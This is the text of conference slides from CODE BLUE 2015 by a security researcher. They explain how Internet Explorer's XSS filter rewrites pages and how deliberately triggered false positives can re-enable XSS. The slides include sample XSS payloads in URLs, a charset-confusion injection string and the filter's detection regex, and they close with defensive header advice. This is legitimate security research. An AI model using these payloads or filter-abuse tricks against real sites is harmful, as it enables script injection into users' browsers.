XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015

X-XSS-Nightmare: 1; mode=attack

XSS Attacks Exploiting XSS

Filter(Prudence Edition)

Masato Kinugawa

Self-Introduction

Masato Kinugawa

Self-Introduction

Masato Kinugawaxs

Self-Introduction

Masato Kinugawaxs

BHunter

Bug-hunter's Joy

Self-Introduction

Today's topics

❶XSS technique❷Bypass XSS filter technique

Using IE’s XSS filter

Today's topics

❶XSS technique❷Bypass XSS filter technique

Using IE’s XSS filter

Sorry! I Changed today's topics!

Today's topics

What is XSS filter?

How to associate with XSS filter?

XSS Filter

Chrome and Safari have the same function.

➡This time, I pick up IE's filter.

It was introduced from IE8.(2009)

Basic of XSS filter of IE

http://example.com/?q=<img+src=x+onerror=alert(1)>

<!DOCTYPE html><html><head><meta charset="utf-8"></head><body>q param is: <img src=x onerror=alert(1)></body></html>

Before cut-off

If request and response are matched with dangerous condition, XSS filter rewrites a page.

Like this #

http://example.com/?q=<img+src=x+onerror=alert(1)>

<!DOCTYPE html><html><head><meta charset="utf-8"></head><body>q param is: <img src=x #nerror=alert(1)></body></html>

If request and response are matched with dangerous condition, XSS filter rewrites a page.

After cut-off

Inaccuracy of XSS Filter

If matched with the condition, XSS filter rewrites a string unrelated to part of a dynamic creation of user input.

http://example.com/?q=AAA&<meta+charset=

<!DOCTYPE html><html><head><m#ta charset="utf-8"></head><body>q param is: AAA</body></html>

World of after introduction of XSS

filterAll site suddenly had the possibility of partial rewrite of a page.

##

#

2008 2009

About little changeIs it no big deal?

➡Let’s think about changing 1 byte at somewhere!

##

#

http://example.com/?q=AAA

<!DOCTYPE html><html><head><meta charset="utf-8"><title>TEST</title></head><body><script>s="AAA".replace(/</g,'<');document.write(s);</script></body></html> Dynamic creation of

User's input to inside of string literal

http://example.com/?q="/</script\

<!DOCTYPE html><html><head><meta charset="utf-8"><title>TEST</title></head><body><script>s="\"/<\/script\\".replace(/</g,'<');document.write(s);</script></body></html> XSS measures is OK

http://example.com/?q=<svg/onload=alert(1)>

<!DOCTYPE html><html><head><meta charset="utf-8"><title>TEST</title></head><body><script>s="<svg/onload=alert(1)>".replace(/</g,'<');document.write(s);</script></body></html>

















<svg/onload=alert(1)>


<!DOCTYPE html><html><head><meta charset="utf-8"><title>TEST</title></head><body><scr#pt>s="<svg/onload=alert(1)>".replace(/</g,'<');document.write(s);</script></body></html>






<!DOCTYPE html><html><head><meta charset="utf-8"><title>TEST</title></head><body><script>s="<svg/onload=alert(1)>".replace(/#/g,'<');document.write(s);</script></body></html>

















http://example.com/?q=</title><svg/onload=alert(1)>

<!DOCTYPE html><html><head><meta charset="utf-8"><title>TEST</title></head><body><script>s="</title><svg/onload=alert(1)>".replace(/</g,'<');document.write(s);</script></body></html>


<!DOCTYPE html><html><head><meta charset="utf-8"><title>TEST</ti#le></head><body><script>s="</title><svg/onload=alert(1)>".replace(/</g,'<');document.write(s);</script></body></html>







http://example.com/?q=%E3%81%95";alert(1)//

<!DOCTYPE html><html><head><meta charset="utf-8"><title>TEST</title></head><body><script>s="さ \";alert(1)//".replace(/</g,'<');document.write(s);</script></body></html>


<!DOCTYPE html><html><head><m#ta charset="utf-8"><title>TEST</title></head><body><script>s="さ \";alert(1)//".replace(/</g,'<');document.write(s);</script></body></html>

Interpretation of UTF-8

"さ \";alert(1)//"

0xE3 0x81 0x95 0x5C

UTF-8 さ \Shift_JI

S 縺表

"縺表 ";alert(1)//"

Interpretation of Shift_JIS0xE3 0x81 0x95 0x5C

UTF-8 さ \Shift_JI

S 縺表


<!DOCTYPE html><html><head><m#ta charset="utf-8"><title>TEST</title></head><body><script>s="縺表 ";alert(1)//".replace(/</g,'<');document.write(s);</script></body></html>


<!DOCTYPE html><html><head><m#ta charset="utf-8"><title>TEST</title></head><body><script>s="縺表 ";alert(1)//".replace(/</g,'<');document.write(s);</script></body></html>

Basically,Even 1 byte of change is risk.

In the past,

If you don't do careful, Rewrite of XSS filter also becomes vulnerable.

https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU-2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf

Universal XSS via IE8s XSS FiltersEduardo Vela Nava & David Lindsay



2015: Is it safe at now?

Let’s see how much real cut-off rule is!

I found XSS vulnerable patterns page of normal structure which has no XSS

It is safe…no, it doesn't!

Apart from it this

This case will publish after modify.

Cut-off RuleIt isn't documented in particular. We can see the loading binary to browser of dll include regular expression of cut-off strings.

<button value=<form><textarea><isindex><input value=<option value=<embed src=<embed type=<iframe src=<frame src=<x:vmlframe src=<link href=<import implementation=<meta http-equiv=<meta charset=<a href

<script src=<script xlink:href=<script href=<script><applet><object type=<object codetype=<object classid=<object code=<object data=<base href=<style>@i<style>:(<style>:\<style>=(<style>=\





<button va#ue=<fo#m><texta#ea><is#ndex><input va#ue=<option va#ue=<em#ed src=<em#ed type=<if#ame src=<f#ame src=<x:vmlf#ame src=<li#k href=<im#ort implementation=<m#ta http-equiv=<m#ta charset=<a hr#f

<script src=<script xlink:href=<script href=<script><ap#let><ob#ect type=<ob#ect codetype=<ob#ect classid=<ob#ect code=<ob#ect data=<ba#e href=<style>@i<style>:(<style>:\<style>=(<style>=\ After cut-off

<button va#ue=<fo#m><texta#ea><is#ndex><input va#ue=<option va#ue=<em#ed src=<em#ed type=<if#ame src=<f#ame src=<x:vmlf#ame src=<li#k href=<im#ort implementation=<m#ta http-equiv=<m#ta charset=<a hr#f

<script src=<script xlink:href=<script href=<script><ap#let><ob#ect type=<ob#ect codetype=<ob#ect classid=<ob#ect code=<ob#ect data=<ba#e href=<style>@i<style>:(<style>:\<style>=(<style>=\ After cut-off



<a hr#f<m#ta charset=<li#k href=<script>

DEMO#❶

❷❸❹

I want you to feel itSafety of your site is depend on XSS filter.

➡Is it browser's bug?　 Should browser do something about it?

I can not say rewrite of page is always safe.

From the first, your page is

Can you declare your site that can stand up to partial breakdown?

XSS filter can do thisXSS filter very carefully rewrites a page.

#

In fact

In some case, it is possible to not operate specific function from intentional false positive. (…)Did the author of XSS filter introduce XSS filter while recognizing about the risks? (or not) I’m interested a little about it.

Mr. Terada's bloghttp://d.hatena.ne.jp/teracc/20090622

Browser side introduced it, knowing the risk.Mr. Terada and Mr. Hasegawa's log at 6 years ago is as follows:

http://d.hatena.ne.jp/teracc/20090622

http://d.hatena.ne.jp/teracc/20090622

In fact

http://b.hatena.ne.jp/entry/14131603/comment/hasegawayosuke

Insider said"The answer is Yes. ".

Mr. Hasegawa

Browser side introduced it, knowing the risk.Mr. Terada and Mr. Hasegawa's log at 6 years ago is as follows:

➡Does Web developer use it while taking care of the risk?

http://b.hatena.ne.jp/entry/14131603/comment/hasegawayosuke

What is "taking care of the

risk"?✔ you should completely grasp XSS filter's cut-off action.✔ If the part of the page is rewritten, you should inspect all page for normal operation and safety.

✔ If the page includes dangerous part, you should rewrite the code one by one for avoidance.

Then, you should do as follows:

Can you do those?

Example of cut-off string

javascript:1vbscript:1vbs:1

Example of cut-off string

javasc#ipt:1v#script:1v#s:1

Is this simple?

Detail of cut-off of javascript:

{(j|(&[#()\[\].]x?0*((74)|(4A)|(106)|(6A));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()\[\].]x?0*((65)|(41)|(97)|(61));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(v|(&[#()\[\].]x?0*((86)|(56)|(118)|(76));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()\[\].]x?0*((65)|(41)|(97)|(61));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(&[#()\[\].]x?0*((83)|(53)|(115)|(73));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(c|(&[#()\[\].]x?0*((67)|(43)|(99)|(63));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(&[#()\[\].]x?0*((82)|(52)|(114)|(72));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(&[#()\[\].]x?0*((73)|(49)|(105)|(69));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&[#()\[\].]x?0*((80)|(50)|(112)|(70));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(t|(&[#()\[\].]x?0*((84)|(54)|(116)|(74));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(:|(&(([#()\[\].]x?0*((58)|(3A));?)|(colon;)))).}

Detail of cut-off of javascript:

{(j|(&[#()\[\].]x?0*((74)|(4A)|(106)|(6A));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()\[\].]x?0*((65)|(41)|(97)|(61));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(v|(&[#()\[\].]x?0*((86)|(56)|(118)|(76));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()\[\].]x?0*((65)|(41)|(97)|(61));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(&[#()\[\].]x?0*((83)|(53)|(115)|(73));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(c|(&[#()\[\].]x?0*((67)|(43)|(99)|(63));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(&[#()\[\].]x?0*((82)|(52)|(114)|(72));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(&[#()\[\].]x?0*((73)|(49)|(105)|(69));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&[#()\[\].]x?0*((80)|(50)|(112)|(70));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(t|(&[#()\[\].]x?0*((84)|(54)|(116)|(74));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(:|(&(([#()\[\].]x?0*((58)|(3A));?)|(colon;)))).}

http://masatokinugawa.l0.cm/2012/09/xss3.html




If you can do those,✔ you should completely grasp XSS filter's cut-off action.✔ If the part of the page is rewritten, you should inspect all page for normal operation and safety.

✔ If the page includes dangerous part, you should rewrite the code one by one for avoidance.

I think you can modify all XSS on your site...

➡What is the best?

X-XSS-Protection:Value Effect

0 Disable

1 Enable(Partial rewrite)

1;mode=blockEnable

(Prevent rendering of the page)

Default

The response header that can control XSS filter.

How arecareful persons doing?

HTTP/2.0 200 OKDate: Mon, 19 Oct 2015 22:32:06 GMTContent-Type: text/html; charset=UTF-8Content-Encoding: gzipServer: gwsX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGIN...

HTTP/1.1 200 OKContent-Encoding: gzipContent-Type: text/htmlDate: Mon, 19 Oct 2015 22:40:37 GMTx-content-type-options: nosniffX-Frame-Options: DENYX-XSS-Protection: 0...

They are calculatingly controlling!!

The choice which considered more

safetyValue Sites which should choose header

0 They are measuring basic XSS./They want to remove false-negative.

1 Not recommended(Discovered technique affects here.)

1;mode=block

It is probable that the site have XSS./They want to protect site just in case.

default

X-XSS-Protection:0 or 1;mode=block

Is mode=block safe?

It should don't affect direct script execution.I think a favor of the filter is bigger than it.

If feature of cut-off can detect from outside,they may guess page contents.This possibility probably can't be changes to zero.

On the other hand…

Comments for Web developer

Me

How about changing to 1;mode=block?


How about changing to 1;mode=block?

Cut-off explanation is unkind, It is difficult when user support

of false-negative…

Dev

Me

Cut-off explanation is unkind.

Sure…

I think this site is measuring basic XSS,Would you like to use X-XSS-Protection:0?

Me


I think this site is measuring basic XSS,Would you like to use X-XSS-Protection:0?

MeUser may think about setting of infelicity security function with highly priority of product action.

Dev


Trap of XSS filterXSS filter cut off only attacked position then it shows other position, it seems like the smartest.

0 1 block

This action is the risk.

ConclusionsI'm hoping for improvement of XSS filter.

It should still be possible to do safely.Is present default action really OK?

In theory, cut-off risk is inseparable from XSS filter.I want web developer to know this possibility.I highly recommend XSS protection control except default action.

http://l0.cm/xxn/

Real Nightmare will be published on this

URL.

lower-case of L and Zero

http://l0.cm/xxn/

http://l0.cm/xxn/

";alert#"Thanks!"#//

@kinugawamasatomasatokinugawa@gmail#c

om

Software

XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015